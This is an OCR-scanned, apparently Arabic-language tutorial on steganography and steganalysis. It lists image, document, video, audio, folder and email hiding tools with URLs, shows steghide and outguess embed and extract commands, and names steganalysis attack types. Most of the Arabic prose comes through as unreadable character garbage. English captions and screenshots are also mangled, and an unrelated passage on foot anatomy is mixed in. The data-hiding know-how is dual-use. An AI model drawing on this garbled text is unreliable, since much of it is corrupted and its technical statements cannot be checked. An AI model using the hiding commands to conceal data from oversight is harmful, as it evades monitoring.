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; C5 jVI c5^jj cs-^ j ^ 2 J^-^ j-^j^ J ^^ j ^ ^ Wizard J^La* ^n/nlU 




jjoj ^1 Sjjj^all jUikl J^U. ^ jiil Open Image <jj* Vji ^ jSj cj! j^VI ^ ^ ^j-^h ^ ^ 

.(_£jjuJl (J^aill s-li^V s-Uai£ 1 * ^ l^JLudJ 

THIS IMAGE DOES NOT HAVE A QUICK STEGO SECRET TEXT MESSAGE. 

,6*liaJ ^jjj ^ilt (j-ajll j^fi^V Open Text <jj* f Sjj^l jV*^' ^ 
J^l^j (j^aill £^*L ^ Hide Text u*^ f ^jjj ^ilt (j^aill 1 - ^1 j jjj^all tij^aJ (jVI 

(j-aill J j > ^>^1 U ^jij dii^ L j£*l\ *\Ai fjL Get Text jj ^ j^-j Hide Text jj^ < 

^ j^kj j (The text message is now hidden in image) jit * j^Jl ^ j-aill *tia>J ^Uil ^ 

.Save Image (jj* j^j ^ j ji^l oajJI a? s jj^t ^ j£j l^a j s j^VI s jla^JI 



EM 



QuickStego - St eganog raphy - HmJc 



CYBERNESCENCE 





The feet are flexible structures of bones, joints, 
muscles, and soft tissues that let us stand 
upright ancJ perform activities like waiting, 
running, and jumping. Trie feet are divided into 
three sections: 

The forefoot contains the five toes (phalanges) 
and trie five longer bones (metatarsals) 
The midfoot is a pyramid-like collection of 
bones that form the arches of the feet These 
f include the three cuneiform bones, the cuboid 
bone, and the navicular bone 
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Image Steganography Tools 

Liajl «j tlijLoj Igi^U ^1 Quickstego sl^Vl 



Hide in Picture available at http://sourceforge.net 

CryptaPix available at http://www.briggsoft.com 

BMP Secrets available at http://bmpsecrets.com 

OpenPuff available at http://embeddedsw.net 

Openstego available at http://openstego.sourceforge.net 

PHP-Class Streamsteganography available at http://www.phpclasses.org 

Red JPEG available at http://www.totalcmd.net 

Steganography Studio available at http://stegstudio.sourceforge.net 

Virtual Steganographic Laboratory (VSL) available at http://vsl.sourceforge.net 

Image Steganography Tools for Linux Jk 

Steghide -1 

http://steghide.sourceforge.net/download.php :j^^l 
jj^all CjliLJI j ojjx^a a a ^Ijjl ^ cAiUJ! ^^Jc Sj^ta c ^j3I diL* jLcaII ^ILkV ^1 jV( j^xa ^U^j j& Steghide 



steghide embed -cz picture.jpg -ef secret. txt 



steghide extract -s: picture . jpg 



06® damien@damien-desktop: - 
File Edit View Search Terminal Help 

damien@damien- desktop :~$ steghide extract -sf picture2*jpg 
Enter passphrase: 

wrote extracted data to "secret *txt" * 
damien@damien- desktop :~$ | 



Steg -2 

https://steg.drupalgardens.com/stegdownload 

jjiiJl $.\ jjuj jjj^II CjL* jlx-<Jl s-li^V jjLujjIIj CjU» jLlxJI $M±\ dAjjjj ^^jjaij _ + +<^9 t<U a i— Aja ^j; Steg 

jjojjII ^ikluiJl j j^oj .BMP 'PNG 'TIFF 'JPEG (JPG)jJ^^ 5^ l> ^ J*^*^ J ji_jJa* 

(j£-GJ . j lal JJ a jjjjuHll ^Uixaj (JjLxUxJI jjfljudlll ^Uixa <J£ ^I^JjojI ojjj^all ^JJ^J tdjUa jlx-<Jl s-tik] J^ljt-a ^J^^J ^j£-<uJl 

#( ^jai^)3! s^jujLia £c>ili^)i3! (Jj^^l cilj^jj 4 OS X^-* j jj^j ( -— ^ 'U"^\^ / cs-^ cJ-^ Steg 
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Q> © ® St eg 

File Edit View Hide Extract Tools Help 



Original Media 



Modified Medi 




■ ill fmrt ^p f ipd^ 1 rurvnansksli^H WMh four 
Plan? RkmI ThMI 



**** media Info In. **** 

Format: 32-bit RGB format (OxffRRGCBB) 
Geometry: Height = 16S p Width = 320 



liilrni^t ^prnh Tnmu^iid^nl Wilti Tour 
Plain? IkhI TTiis! 



**** media I nf Out **** 

Format: 32-bit RGB Format (OxfFRRGCBB) 
Geometry: Height = 166 , Width = 3ZO 



ED cnz 



p i ct u re 1 .j p g : Ava i La bte Spa ce: 19 Kb 



OutGuess -3 

dAiUJ! j^axi <Jt-nla .lIjUUJI j^L^axi (j* S^l j dull ^£ ^LiiLxJl dlLa jIscaII J^-^j JJJJ <^jJl J A-i^Jtc <^JC- jjU jlm Sbl j& OutGueSS 

<jU^3I j 3_jjajli3l dijU3l ^-Ij^ImiI ^j) IgiLi ^ ^jII Sas <q ^—^-^ djL^JljL^ ^AijA\ Axusu .OutGuess j& ^ lIlgj V 
jj ^| ^i^ki^i aj&ai OutGuess J^j5 <(* JPG j PNM j PPM LA^ .J^*^ ^ (jjsAtj* l^U jl ^ l^k 

Jjaxj] l^l^ki^l jLqj seedj Mk±xi (43 u' ^ c±L ^1 ^j^j3 generic iterator object OutGuess 
JjuoLoij i^j] JUj OutGuess 'seed e&j^ ^ ^ ^W^' u^ 3 ^ f .iterator ^ji^ 



outguess -d secret. txt picture.jpg picture-output.jpg 



^JJjuj <ULojj AiUiaV ^aij^aJJ ^^Ld^lc ^UJ <ULoj^)3I ^aJ (-K) ^l'^*>nl aJ 



outguess -k "my secret key" -r picture.jpg secret.tJtt 



Document Steganography 

IgJjj^J ^aJJ q\ ^glc 4_}JjuJ| <JjLal^)3l e-li^V a jaJLuJj L_J jLoll J& AijJ jll CjL* jlx-<Jl ^likl 6 Jjj^ll cJ^-^ iUi jIslxJI ^likj <9J^)Ja Jlxi 

jll cJ^.IAj CjUi jIslxJI ^lik] C5^^^ ^^Jd .L3"^ ^ 



Document Files 



* — aOI 



St eg Tool 



information 



$ ■* ? >#< 



4 ^ ^ 



Document Files 



5a 

StegTool 



Information 
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Document Steganography: wbstego 4k 

http://wbstego.wbailer.com : j^-a^ll 

Cy> t&Laj iStaVI oiA j»|jiiuiLj ., Vi1m« ^ cjLsjkAll *UiJ Sbl j& Wbstego 

c^liL j HTML Jj^j ANSI J ASCII <> cljliLJI '16.7m j 256 j 16 u 1 f Windows bitmaps 

Adobe PDF 



□ 

?; 



■■■■ 



I 

I 

■□- 



» Start 



77* 



E 



Welcome 1& ike wbStegtid W&ard! 
Step 



Bate 



flings 



ThawbSfego 1 ! Wiraid™|l guide pcm sfcpby siaptmo^ii 
CQdiiiy/decocing. 

Wtih ^bhiogo^ you ore abl s 10 hide any hie? in o cam trifc 
opiiccJiy 

h ygv #rg familiar '>,'ih the way the premium wi*s you ear* ute 
1ha Flawdiarl-Mad a 1a maka all *#thgt n an cr/tM&w 



Document Steganography Tools +- 

J AhY)^ «\\ jjVI tS^ CjUL d^b CjUUJI ^U^U cill ^Jil! ^ j^Vl c> 'wbstego sbVl Ji« 

Merge Streams available at http://www.ntkernel.com 
Office XML available at http://www.irongeek.com 
Data Stash available at http://www.skyiuicesoftware.com 
FoxHole available at http://foxhole.sourceforge.net 
Xidie Security Suite available at http://www.stegano.net 
Hydan available at http : / / www . craz ybo y. com 
Stegl available at http://stegi.sourceforge.net 
Stegostick available at http://sourceforge.net 



Video Steganography 

~\ iklujl ^jj . jlj-dlujU AiixLJ! jj^all L_aL» Cjbl^ldl ^ ^\ 4ji^yA\ cAiLJ! <JjLojj ^U^l ^jlaii Video steganography 
j& <]SU3l jj*iii3l djULd .llai ji&l ciL ^aLaJI <^A* j^*-*^ .AjjjuJI CjLg jLlxJI J>l^j3 Ia jt nr.U jj^JI c!jUL» 

Video Steganography: OmniHide PRO 

http : //omnihide . com : j^iJI 

Sfego^Ajl\ t aLJi _til3i L»j ^(^ijjaj ^11 CjliLi & 4DjLia jjc. Sjjj^a J^-b t ^^-^ ^ OmniHide PRO 

^ ^aLiJl CjliLJl ^ILkV JJ^ AiLjal Uiajl till ^JJJ >( jjlilala3t (j^cl (j-a tiL ^j-aLaJl ^JjoJI 
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Omni Hide Pro Trial vl-O 




ide 

Hide your data from those prying eyes 



Omni Hide Recover | Settings | Go Pro! [ About ] 



Mask File | C : \ U sersV Ad mi n i 5 trat pr\D e skto pMnp u t Ima-g e s\t i g er_ d i spl ay J pg 

File To hide | C \ U se rs\ Ad minis tra I or"..D e skt o pMnput Imag e s\Tlie rigcrdocx | 

option* ▼ 

Output File | C \ User5\AdmiintstraToADeskTop\lnpy t Imag es\tlger_di splay _Out Jpg | "^^^ 

□ v/iew converted file when complete 

Hide U! Exit 



Video Steganography Tools 

Our Secret available at http://www.securekit.net 

RT Steganography available at http://rtstegvideo.sourceforge.net 

Masker available at http://www.softpuls.com 

Max File Encryption available at http://www.softeza.com 

MSU Stegovideo available at http://www.compression.ru 

BDV DataHider available at http://www.bdvnotepad.com 

Stegostick available at http://sourceforge.net 

OpenPuff available at http://embeddedsw.net 

Stegsecret available at http://stegsecret.sourceforge.net 

PSM Encryptor available at http://www.softpedia.com/get/Securitv/Encrvpting/PSM-Encryptor.shtml 

Audio Steganography 

MP3 <AU < WAVJ^ Cjjj^JI l^L ciL a >^Uti ajjjuJI VL* jSI *liaL till Audio steganography 

CjI jjjt ill -C5 J jj^II d fll&ll (j-a <^\-& lU'^-'^ t fljila Jjlisu (Jj^ia (jC Ajj jj^II CAiLJ! AjjjuJI <JjLuj^)1I ^jAjJaJ jj^II 

La <Ljiaj <jjjuo1I djUUill jjiAjjaj t . cillil -c _^j jj^all c aLili ^ &Ua^ 3JLojj a (jc L_flJ£l! (db^aiLJI) eavesdropper 
jj^I! t flLftlt CjU» jIslaII ^likl (j^j .(jLaijVI cJ^ t * a '^^ clA^ J^^^ t LLila tilLiA (Jj^j <>— ift j 

.(>20,000Hz) ^jA^ 3 imitb Ac- jjc. ^1 CjI^jj ^l^klojU ji LSB ^1 v^»»ilj 
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(3j2>*1| cjliiJI cjUjk^l * till jjla) Audio Steganography Methods 

^^Ic ^ jflJ ^jJl ^J-ajjl J^Jl ^jq'nj jSlS L_u3LojV1 (J^asu .d jj^all dliLa ^ 4 > A ^ \\ 4j^>juJI (JjLujjJI <L^llaJl Jj^Ial! (J^asu tilUfc 

exploiting ^ lS 4-^^ ^Vu > n j^VI o^axJI < {noise signat)^^y^ * j^j dUjla^ll JL^j 

# dL» jJjlaJI e-li^V ejjIalLall dljLujVI a ^ B » a dLuSj (jjljlklj 

;Cj j^all Cjlil* Aj>y»lt CjU jLlaII f til) iiiHJ 4JUl! c_u]LujSfl 



Echo Data Hiding -1 

^{Echo) J^j c^j^ c> ^ JSU d jlij Jib <j>JI jkJI o^^i <the echo data hiding method ^ 
j^hll c {decay rate)CP^^ J^*-* < {initial amplitude)^ jVl 4*-uJI '{Echo)L£±^\ i> ££15 ^ 

' ffecr^ases)^* 1 ^ o^lLkjl j {Carrier signal) JSU1I &J^] ^ 3^1 jVl Ak. .Ajj^II dULJI *UlV tillij {offset or delay) 

jj-dj ^j-<i a laSllI £>i& ttilli ^ j ,A-iL^Vl ojLoiVl Jl <iK (^^-a ojUjcU {Echo sound)iS^^ t — 3 6 ^ lajjll 

.^-gJjoiaJIj td all ^ ^jj t^L^aVI d all SjLujI 4_iC (Jlxi (J^l jC ^^-Ic Axusu dl jj^aV! 

jj^j jl C; 5^ijj .4iln*JI (j^Ull dSj) delay times c> ^l^i^l ^ ^{Binary form) c*^-^ J^ll ^ <^jU1I s jl^VI j^il 
J!>UjVI Jax^j {initial amplitude)^ jVl <xjuJI Cj^UU^II (J^xj Uiajl ^^ajLj jj^II ^1 j^VI 6^ ^^j' 

-( j!UaVI Icj-^ujixi (jjjJ djjj^all ^ rn^ij ciii^j <c ^ajolaJ! ^11 ^ ^^1 {decay rate) 

Spread Spectrum Method -2 
c_j jLjVI I^a ^>iklu^j . {frequency spectrunt)u?^j^ cAikl! j^a jj£I jjc ajjjoJI cjU jl*-<Jl jJij 4<Ljiall ^ 

{spread spectrum)^^ jU^I <> oii^j 
frequency hopping spread spectrum (FHSS) j Direct sequence spread spectrum (DSSS) 
{pseudo-random signal)^ J 4^1 SjUl ^ 4 iu , hi ^ ^ (djlii) chip rate c> <j>JI ^ll^jll >^ <. DSSSc^ 

^UaiJl 6jLaiVI 1 > ? >n ^aJJ ^^jll j 
^ bju^J S- 1 *^ c ^J^l jU^ojl <9Jjia .dib^jjll jjlJ <C jjoiJ jiL 4Jla tillil ^ jj^all c al^ll dib^jj c LiL ^ 'FHSS 

.4_jj£joix1Ij <JjUj3I ^1 jjoj ;4_LaVl CjVU^jVI 

LSB Coding -3 

Jil V*l JaSfl ciult ^ (J?/A^y)^uai a^JI ilL- jll E l jj) l^a ^ ^Ij LSB insertion ^ Ji. cUu LSB encoding 

dJI 

L_JC^i3l j! O-^VI Jl J5^J Aijjlall -C5 J jj^all C alxll ^ ^.Lja jjJa lAjj L_S jjoj b^ jl <KAa1I j AjjjuoII AjjUjII djUUill JlA^V 

pLja jJ^all ftUS ( ■ UjudJ l^.l^pJLuj|j <1 > nj l^ilc L_fl^xjll (j^J a aII CjUUill / flj£lll ^^Ic JSI <9j^lall cJ*^ L " J J J ^^ L C5^ 

. resampling j {Channel noise) 
Tone Insertion -4 

I— Ijaul AiUall 4 > ajklo CIjIasuII ,<aUall <jjaiklxi djUisu (jL^.^j (_3^^ a CP" L — 5 J^^^ SjLujj ^ djUUill ^jj a > >i1 ^^ic L_J jIjojVI li^ ^jiaii 
L_1xj^3I ^j^a .<iL ^aLkll AjjjuoII 3JLoj^)1I J j ^q^J 6<C jauia C-Laul l^jl La£ . J^^J cs-^*^ di jj^II dljLail J j <C j.<i>.a<ft 
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(low-pass filtering) cjLo^JI t . nyil l_j jLujVI ^cLoij a & jj^JI SjLij ^ <ULoij3l <jc- i L!a£H c_ b^ajl&l] ajjouIU 4jIx13 

. (AiV truncation)^4-^ £LkSI j 

.dl jj^II CjliLo ^ AjjjoJI diljUJl plLkV ^J^)ia3l £>i& (j-G 6^.1 j ^AJJ 4_1x-gjui3I dlLa jlx-<Jl ^lik] ^c^l^)J 

Phase Encoding -5 

jj-gjIj ^jL ,cAiLiJ! Jldj jll ^.1x^.^31 aI^^JIj aA jV( <--) jj^all JIaiLuj! l^ja ^jj jll <i^.^<JI 4iU j ^jj Phase coding 
<jjji^j jll s jl^VI J (phase spectrum) l-LjUI <k J (phase shift) o^bja^ll ^ 4jj^> 4JLu> jll cjIIj 

.(signal-to-noise ratio) *L^j^JI J] sJ^VI c> (sfl/? encoding) 

Audio Steganography: Deepsound ^ 

http://ipinsoft.net/DeepSound 
sbVl !:^U csLSaj . (WAV and FLAC)^ cjULJI J ajjjJI cjUUJI ^> £ jj ^1 *tiaj Jc cihoL^j Deepsound 

.i>^ ^j^ll cjUUI Jc a jjlS I^jI U£ . j^Vl jUl J uj^ (Audio CD track) 

(jja (jjj jlxll (jAiVI jjlU jiJl ^2 Deepsound c ^ ^^ala ^ j-<JI (jiajximt 3 > ^ aj c JaUll L_aLa3l J dAiUJ! J jj^a jll 




Audio Steganography Tools 

Mp3stegz available at http://sourceforge.net 
MAXA Security Tools available at http://www.maxa-tools.com 
BitCrypt available at http://bitcrypt.moshe-szweizer.com 
MP3Stego available at http://www.petitcolas.net 
Hide4PGP available at http://www.heinz-repp.onlinehome.de 
CHAOS Universal available at http://safechaos.com 
SilentEye available at http://www.silenteye.org 
Quickcrypto available at http://www.quickcrypto.com 
CryptArkan available at http://www.kuskov.com 
Stegostick available at http://sourceforge.net 
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Folder Steganography 

.Invisible Secrets 4 Sl^VI ti^=^ u' ^ .dj hK^ l *tik) jjAj Folder steganography 

Folder Steganography: Invisible Secrets 4 

http://www.invisiblesecrets.com 
t> Qi^l^l] £±s jIjV! ^ c> ^jjjilVI JjLoj j -kaUJ ^Jillj CjULJI jjii^ jj j& Invisible Secrets 4 

^ ^IjjVI £>i* j 6C_JJj3l diUij^a jl Cjjj^all CjUL jl JjJ^all *cs-^ ^ J3"^ ^Ujl! £-^J 




Invisible Secrets 4 




■ r>. / - * j t * ...... 



llKI->|K Ho 

> l>c<fpt files 
► OpCftCryptfcomd 




► IP CO W 



n ttp://www. invisiblesecrets. com 




Decrypting Package 



Ffes 



Popup Mr«^»gr 



Select the fies you *w* to r*t*fe in the ief <4ecryphro tMkoQt 
(You <«n add Nes bv dropphg them on th* bt). NEXT to contnue 



Kara* 

_3*nan :vt is: 



HTFf. DoOJWt 

CryptodRte 
L-wt He 
Cascadng SMe.. 
CryptedRle 
ACDSee JPCGI... 



FulPath 

C :lalnalWEBSITE\Ten*>late*l 
C :^^WEB5TOTefnp»at«l 
C:^r«\tt€BSITE\ 

c:^\vMtBsrrt\ 



I ^^h^ ] ^ Add Aider s [ tfRenoye 



I Bad | Next > I f Help | [ X Oc** | 



jUjkJI folder steganography CjIj^VI 



Folder Lock available at http://www.newsoftwares.net 

A+ Folder Locker available at http ://www. giantmatrix. com 

Toolwiz BSafe available at http://www.toolwiz.com 

Hide Folders 2012 available at http://fspro.net 

GiliSoft File Lock Pro available at http://www.gilisoft.com 

Universal Shield available at http://www.everstrike.com 

WinMend Folder Hidden available at http://www.winmend.com 

Encrypted Magic Folders available at http://www.pc-magic.com 

Quickcrypto available at http : / / quickcrypto . com 

Max Folder Secure available at http://www.maxfoldersecure.com 



Folder Steganography Tools i- 
\ LjJ\ 'Invisible Secrets 4 J\ Ait^ 
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Spam/Email Steganography 

±jA\/4j^jA\ JjL^j l^jlLkj JjjL JjI^JI JLu>jj jjAi Spam/email steganography 

.Spam Mimic staVI ^ s^Luu* ^ tl£^ I^a -c _^iljc. jjUuluJI djU^jjl j^. ^ s^Lai* ^ tAjj^joiaJI cjVI^ jJI 

Spam/Email Steganography: Spam Mimic 4k 



http : / / www . sp ammimic .com 
JjI^ j aIL* j3I j^j/ j^ji? ^jSj .Peter Wayner J Mimic ^ Spam Spam Mimic 

(Spam) ^^-^ ^-^j 'So^ <JIjujj31 j^j^ l^^ 3 Sl^VI jjq/nMI/ j^jjll . j^jjll j jjq/^u tila ^ J£3 <*-j1j-^ 

.^Liaill t fake Russian 'fake PGP ' jjj* ^ 




Alternate encodings- 

• Encode as spam w£A a password 

* Encode as fake PGP 

• Encode as fake Russian 

* H33 Encode as space 



home | encode | decode | explaDanan | cf edits | fkq feedback | terms | Francais 



wwvi.spammimiccom/enccde.cg i 



<7 <K 



ICHcar Cclleag-je , Th«n]r-you For- yo mr interest in. oar 
I r.«vjie:t«r ! n yau no ungex :a ireccivt cur pvLfrii:« 

|ilKply r«iply -w±x-ti m Sub] «ci i of "REMOVE"" «nd you will 

nedi Btely b-e reKoved from a at olob . TSiisj nail is 
|ueinfl sent in cwnEiiaiice witn 5enste Ulll 14 2 jr Tit le 
3 r 3eetiaii 903 * D*3 HOT canf uje us la-it-h T»fc«:irinst ae«B 
a-ti3t 3 : Wt"_v wcrk £ qt acwebady elae when you cam. beemie 
■rich inside 31 mo nihs . Have ycu evet r.ariced ne-airly 

Biad pecpic lavi c = r.venl ence ' Hcl 1 F naw u yEui shacc« 
tc capitalize an this ! WE will help YOTJ deer cose- perceive 
l-hra.i't ? ng title: 6y &r.d turn your btuincaa into aji 

I JT — BUS T NT -33 1 TU* teat c ft j. ng about our syiten la tnat 
lie la fl*3clut«ly cidK Ef«e lor you " Dut don " t beiicrve: 
Iu3 ► Mr HAm«sr cl Masaacf.'jsetts tried u» and, aaya "My 
lonly protlem now is where to part all i»v fa ar a " ! We 

re lieenaed Ta operate in all states ■ Ve baseer- 
I yon — act new Sign up a zTmentl a.r.d your fzisiul will. 

a.e=K "tea- ! Thomk-yQU fox your serious con a ide r at ion 



Mail it 

([Zap this mcssiige into your nuder 
. . but it won't be sent xarural you dicJc 
on Send) 



You can copv tike message out of tfae 
text box and paste it into a tnai 

* I .t.hv r\ v.- ]i ni.'x program 

* How to copy and paste el 
Windows 

• How to copy and paste in X 

• How to copy ackd p&ste cm a Mac 
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Natural Text Steganography: Sams Big G Play Maker 



.Play ^AaajomH ci^ L>^ 4^*-^ I j t mMl Jj^Uc A ual m^l CjLg jIslaII Jjj^aj ^ jflj Au (JLlLa jlx-al! e-lik] ^c^l^)J 

.natural text steganography ^ Sams Big 6 Play Maker 

jju^ JUi ^ ajjjoJI JjLuj jll V^^aj ^ ^1 jj^j <Jj*jJe1I ^Uaj ^L** Sams Big G Play Maker 

V tSbVI ~\ iklxA j IajLuuI ^jj ^^jII 4_jjjoJI 4JLoj^)3I ^jj - gall <JjLuj^)3! ^^^ic d^Ic (3flaij 11a .aj^Ia^ jl aJjoi^ (Play) 



Sams big G play maker 



General I Wordksts | Equr 










- 



Abour 



[Phi slitters 1 Imes) 

Mike says 'Wire's a pint" 

Harold says "Hot steamy grits!" 

(Adam stutters 1 times) 

J ason says "Alive" 

(Jason scratches head 1 times) 

Jason says 'Yes thank you." 

Adam says 'Where?" 

HaroW tsy^ "At your command?" 

(M*.e strikes Mike 1 times) 

Phi says "Where?" 

Paul says 'What does MPEG mean'*" 

Paul says "AM An earthlingl" 

Kenny says "Hot steamy gntsl" 

JMike steps forward 1 times) 

JYA says "Mne's a pint" 

Mr Hanky says "Hot steamy gntsl" 

Mike says 'Hot steamy grits'' ' 

Phi says "Did he mean to die just then'*" 

Mr Hanky says '1 never talc poltics " 

Sam says "Mike you ladyboy!" 

Jason says "But I read slash-dot" 

end of scene 



(Issues in Information Hiding)^-* jk-^t ^ JjL*a 

Steganographic File System -1 

.^Ajlill ( auu^i cAiLJI ^Uaj (j>uia <jujL ^ II dLa jlstxJI ^ 1 > >ri ^^-^ 6 steganographic file system ^ 

C5IJ CjUjkJI c> (allocates dynamically fragments) el Steganographic file system 

^Lq^JLolaI] Uiajl ^ajujJ .L-flJjJa-all Cjl ^aUaj (j-ajJa l^^^ c — eli^-j-J 6 oO^"^ j^-?" CS"^ ^ J^- 

.l^ik AjU^II S^l&J ^ ^311 Jjill ^i^i3 Uiaj! c_j jlk* - 
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(Need for steganographic file systems) ^IjpjjUjIuJI cMIaSS ^ulafr ^UL^VI 

(jj^J qAa jaajud^I] (j^J tft^A (j-a o^cLoui £x» ^ ^JJ^ *^L>^ 4_ii^xJl diULull AjsLjal ^IjC. jjUulLoJl ClAiLa 4_xJaj| jj3 jJ 

^1^)^.1 (j^akjuJl C5 ic t . tdlLa jIslxJI Jl <J jj^ j!3 _L_fl j^. (jj^ l^LdiaJl jl (AjjL^jII jIjjujVI ^J^^ CjU» jLlxJI 

^ ujj a V diLa^lx-Al! e> \ I Cj I ilflj i aLq ^3 CjLq^ Ijla II ^gil (Jja^^II V La^JjAj Ai^st^l^ a^ ^Iaa II dAjj^VI 

J^ajJaJ (jl <Jj3 (j-a l^Jl <J jj^ jll (j£-aJ V JljC- jjUuloJl dAiLJl ^aUaj (j<u >i ^Jti ^31 djUUJl .ClAjLJl J ja. j ^ j£j (j^ J 

4-jjjJ) cjLjI^a Levels of Visibility -2 

1^3 t^jJal j <J^-^ 'Qj" ^Jj^ ^ cs-^S ^ J 4 ^L>*^ Jjic- (JjSj 4jI 4_^.j^3 c-UasJl AjjjulL (JlulS ^j-L&jJalU 4jUr. lil 

^jj 4JLoj^)3l ^jjLdjJaj l^ja ^jj ^31 <L^)]a3l j _^ 5 il£ Jalill (jl (^^-ixj l^a tSjjj^ll Ajjjuu ^jj ^3 lij 6<J!L<Ajj <J^3I cs-^ 

La LJlx. tdjUUJl <3jjuj ^Jl .V J 3joj jjoia^Q JJC. CjUUJI Clljl£ lil (JjJjIa (jC 1&.1U^J 
;CjUUJI £ jjJa j SijJ ^jd .AjjUII 4^^l JjVvh jl jjj«2 Al jU^I Uiiili ^Jill L-iillujVl t> ^JAxJl ^jjj 4_jjUJI 4^^UJI 

.CjUUJI ^ c_ic;^j3I CjVUu^I (j>» Liajl ^jjj 11a jli 
(Robustness versus Payload) ^-Sj^JI 3JUa11 -3 

File Format Dependence -4 

(jl iossj information ^ <ia j^ > ^^ CjUL ^l lossless information ^ lSj^ ^ CjULJI Jjj^j 

^^ic (jjA^UXJ V (jJ^i.1 (jl (j^- ^ 6 Jalill L_aLJl (jAniJJ ^^^Jc Axusu dAiUJ! (jj^jJaJ CjULftC (J^asu ^UasJl ^ 6^ j^. j-<Jl AjjjoJI diUi jIslxJI 

(Jj^aall 4_iLdc. ^ - ^11 ^l^cVI (j-« ^.c ^ ^JJ Sjjj^all floating-point ^— M * jp&§ 1 ^ jj^ f / * a ^^ (jj>»i1 

/ojjj^II ^ Ja j^U L_fl^llkl (_^l A-AaslSI (_^^JJ V .6Jjj^3I (j-d ^13^^ Li> * ^ 4"^^)^^ ^Ua^.1 ^5^JJ (jl (j^J 6^ 

Windows Bitmap (BMP) j^^^ ^Inx^JI jjlj^JI .<ailj pj^aj jl (j£^j dAiUJ! jli ttilli ^ ^ jll 

4_L^aVI jj^ill (JjS^ ^Ja j^JaJ I jj^JI .Lossless compressions 'Graphic Interchange Format (GIF)j 

Steganalysis 

Steganalysis ^ ^CjUUJI ^li^l ^^l-j steganography .steganography ^ a+Ac. aaLc ^Steganalysis 

(jc i aJa£JI (j^jj .<!Lujj3I tilt ^jIujj J tdli (jl£ lilj tSjiuiAll 4_jikJI aJLojjII aAa m a^lA\ CjUUJI (jc t a>^<U ^ iklujj 

^^Ic JJC. lS^^ *^J^^^ djlilxJl ^L^.1 j dull iaLftjl (j^ (Jjjill ^ J^^l J^-^- (j-« <!LuJj3l 

.^uiLxJI djUi jlx-<JI ^^ic ^ 11a (jl jfi*^j .<JLujj ^IjjU ^\ n un c _^j3I Sjjj^aJI c al un^l Steganalysis <^ ^ j*^ *^ j^>^^l 
.chosen-/w^5«^ attacks j message attacks :cj1^j1«^I pU^I ^ CjU^JI ^Ijjl (> (jl^jj 

aJLuo jll ^ILkl (> L&j ^1 JaUjVl steganalyst .cJjUaII stego-image^^ ^^^^ ^j^jj ^ Steganalyst 
.JaLajVl ^ Cjli^\lkVI cJi^j ^^>*^ stego ^Ia^LujLj 3JLujj pLuijJj Steganalyst .^-S^jjJI c j 

^j^i3 stego-image a? jjj^^ .stego-image ^ ^ ^j^J^ o^^ j^^ t> ^3^^ c> ( ' q > ? ^ jj^ 

4_^jJal j (jj^J l— it auS jlill (j-o ^jAslSI ^AjlS jJ cJ^-^^ StegO-image l J *\ h*W Qii b .Ia jlikl ^JJ ^^jll diUi jIslxJI 

,fl laaJI ojjj^ (j-<i (jl jlVI CjUu£jujI (j>» ^jAslSI a I I^JLujI j 

^I^jjojU djjj^II cJ^-^ l^jli^l (^ill CjUUJI (j^axj ,4_ii^<JI aJLoj^)]! cJ^'^ jl j^^j (j^j Stego-image ^l^iLu^l ^^^aj 

s^jlill (jj£i (jl (jl^j Image Domain Tool 

: Steganalysis^^ 

A3 jl Jl5 4_i3 4-iLuIaII CjLq ^lx^ll J^-±i 

Suspect information stream may or may not have encoded hidden data 

.4.1*3^)31 jjj^II <J^.ta b\ ±a aII CjUjI^xJI j s^liS (> Ul^II - 

Efficient and accurate detection of hidden content within digital images 
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SjLuj] jl L_aLJl <J^.b A h a - ^ JjS A\ CAjLJI jjq ujj 

Encrypts the hidden data before inserted into a file or signal 

Steganalysis Methods/ Attacks on Steganography 

i^VtS ^! jjl Steganography ±± cjU^JI ^j^s 

Stego-only attacks reformat attacks, known-cover attacks, known-message attacks, known-stego 
attacks, chosen-stego attacks, chosen-message attacks, and disabling attacks. 

Stego-only attack 4k 

jjj^ia (jc j& ^ j^^ll t . iiaaj 6^1^. jll <L^)]a3l m ^ j^^l ^iii j ^ stego-medium l£ ^ *^ LgAao ^ w j ^ ^ ^ 

Reformat attack 

/ alia a (J^>iaJ diljUJl ^jj^aj j£j Aill^xJl CjlilxJl t^ilaj. ./il Cilia. ,L_aLJl J^luijj Jjlisu ^JJ <L^)la3l J 

Known-cover attack ± 

di^j iajLojjll jjij <j JUI c> l^j .cover-medium stego-medium ^j^j ^ j^-^ ^ <J.ikU 

Known-message attack ^ 

^ ia^Si 4JLuj^)3I ^I^jI A-i&iH <iajuj| jj .stego-mediumj ^ j^-j o^j& ^ j?^^ o-* ^ j^l ^ 

Known-Stego attack 4^ 
.^tla Stego-object j cs-^ 3 ^ L_aLJI j CjLg jLlxJI ^ILk] djU^jjl L-aj^su ^jj ^ j^-g-Ii ) J 

Chosen-stego attack 

jo d^JI .4^Lk obi ^l^kiujU aIL* jll ^ stego-medium Jl forensic investigator 4^ f j**^ t> ^ 

<> ^^11 11a (jl^j steganography mediums i> cjUjSj^I 

Chosen-message attack 

li* <> c_fl^JI djIilJ! Al\^Jlsteganography ^steganography ^->M t> stego-object 4aj Steganalyst 

.steganography J ^^steganography ^l^l^l ja^j ^illj stego-object ^ 

Disabling or active attacks ^ 
A1&& si&l rotate ^sharpen < (noise reduction)^^ j^l JJis 4 (blur)u^^ lU^j ^1 j <*l j^l <^ ^ t Vu^j 
s^^h J^4? c_jL^ JjjL ^ jjUll JJij j cjVj^II J^-^ Disabling attacks . soften j <(resample) 

^rj> > >>ll .stego-medium ^ blurring ^ ^ j -^j^ uj^^ ^ 

(uniform noise) ^l^aj^l .Sjj^J! ^Ij^o jj^ j'j^j stego-mediumj (random noise) 

^ Sjjj^all J ^Lja jjJal! (noise reduction) .c^^ 3 ^^ Jjo£J1 a^i ^11 jlVI j Jjo^JI ^Ij^] 

dia SjjL^xJ! . x^i jjlii]! jj <iV .blur ^ ^>^l*^Si j^-^ j& Sharpening .l^^ ^ ^ j^j l!^'^ cJ^-^- 
.l^k^j yrSaxJ stego-medium ^ Rotation .cjUjI£3I AiU Jc jj^j U %^ j£\ 

j ^Jaii^Ji raggedness c> ^Jl ^^Luj ^j3I (interpolation process) ^lin^VI ajL& lJ^xj U lUIj Resample 
uniform blur cS^j Softening of the stego-medium .s jj^JI jj^I Resample s^lc ^^i^j .stego-medium 

.blurring c> JSi (Contrast) u^W^^ c> ^Ij^Jl o*h^ s jj^' J! 
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Detecting Text and Image Steganography 

4- ^vi"i* jj£ CjUJ! ^^kjja£i JIa ^ . {cover medium)^^- ^LuiLo^JI jl <jjjuJI CjU jl^JI *lLkl ja j& Steganography 
